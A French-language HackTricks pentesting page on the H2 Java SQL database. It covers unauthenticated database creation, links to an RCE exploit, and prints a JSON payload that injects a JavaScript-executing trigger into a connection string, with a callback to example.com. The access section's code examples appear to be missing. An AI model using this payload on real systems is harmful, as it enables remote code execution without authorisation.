H2 - Base de données Java SQL
Reading time: 2 minutes
tip
Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)
Soutenir HackTricks
- Vérifiez les plans d'abonnement !
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez nous sur Twitter 🐦 @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PRs au HackTricks et HackTricks Cloud dépôts github.
Page officielle : https://www.h2database.com/html/main.html
Accès
Vous pouvez indiquer un nom de base de données non existant afin de créer une nouvelle base de données sans identifiants valides (non authentifié) :
Ou si vous savez par exemple qu'un mysql est en cours d'exécution et que vous connaissez le nom de la base de données et les identifiants pour cette base de données, vous pouvez simplement y accéder :
Astuce de la box Hawk de HTB.
RCE
Ayant accès pour communiquer avec la base de données H2, vérifiez cet exploit pour obtenir RCE dessus : https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed
Injection SQL H2 vers RCE
Dans ce post, un payload est expliqué pour obtenir RCE via une base de données H2 en abusant d'une injection SQL.
[...]
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('https://example.com/pwn134').openConnection().getContentLength()\n$$--=x\\;",
"advanced-options": false,
"ssl": true
},
[...]
tip
Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)
Soutenir HackTricks
- Vérifiez les plans d'abonnement !
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez nous sur Twitter 🐦 @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PRs au HackTricks et HackTricks Cloud dépôts github.